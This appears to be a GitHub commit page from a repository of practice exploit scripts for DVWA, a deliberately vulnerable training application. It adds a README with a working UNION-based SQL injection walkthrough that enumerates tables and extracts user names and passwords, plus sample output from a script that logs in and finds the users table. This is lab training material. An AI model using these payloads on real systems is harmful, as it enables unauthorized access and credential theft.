Skip to content

Commit c20faa0

Browse files
twseptiantwseptian
committed
split some of directory, and add sqli exploit scripting and poc
1 parent 0d1c63c commit c20faa0

9 files changed

+42
-0
lines changed

dvwa/low/README.md renamed to dvwa/dvwa_rce/low/README.md

File renamed without changes.

dvwa/low/dvwa_low_command_injection.py renamed to dvwa/dvwa_rce/low/dvwa_low_command_injection.py

File renamed without changes.

dvwa/low/dvwa_low_file_upload_to_rce.py renamed to dvwa/dvwa_rce/low/dvwa_low_file_upload_to_rce.py

File renamed without changes.

dvwa/low/dvwa_low_rce.py renamed to dvwa/dvwa_rce/low/dvwa_low_rce.py

File renamed without changes.

dvwa/medium/README.md renamed to dvwa/dvwa_rce/medium/README.md

File renamed without changes.

dvwa/medium/dvwa_medium_command_injection.py renamed to dvwa/dvwa_rce/medium/dvwa_medium_command_injection.py

File renamed without changes.

dvwa/medium/dvwa_medium_file_upload_to_rce.py renamed to dvwa/dvwa_rce/medium/dvwa_medium_file_upload_to_rce.py

File renamed without changes.

dvwa/medium/dvwa_medium_rce.py renamed to dvwa/dvwa_rce/medium/dvwa_medium_rce.py

File renamed without changes.

dvwa/dvwa_sqli/low/README.md

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
# PoC
2+
- determine the number of columns
3+
`' ORDER BY 2#`
4+
5+
- finding columns with a useful data type
6+
`' UNION SELECT 'test', NULL#` => the column contains string/text data type
7+
8+
- check version and database
9+
`' UNION SELECT version(), NULL#`
10+
`' UNION SELECT database(), NULL#`
11+
12+
- retrieve table name from database
13+
`' UNION SELECT NULL, table_name FROM information_schema.tables#`
14+
15+
- retrieve column name from table
16+
`' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name = 'users'#`
17+
18+
- extract sensitive information from database
19+
`' UNION SELECT user, password FROM users#`
20+
21+
python script usage
22+
```bash
23+
$ python3 dvwa_sqli.py
24+
25+
>> DVWA SQL Injection
26+
>> by twseptian
27+
28+
[*] Usage: dvwa_sqli.py <url>
29+
[*] Example: dvwa_sqli.py www.example.com
30+
31+
$ python3 dvwa_sqli.py "http://172.17.0.2"
32+
33+
>> DVWA SQL Injection
34+
>> by twseptian
35+
36+
[*] Grabbing user token & session id...
37+
[✓] user token: 30dac21baf3a6f8d981cb87821e3b335
38+
[✓] session id: 2crpah8eribtb448bgs6t7lql4
39+
[✓] Success login to Admin page
40+
[*] Looking for a users table...
41+
[✓] Found the users table name: Surname: users
42+
```

0 commit comments

Comments
 (0)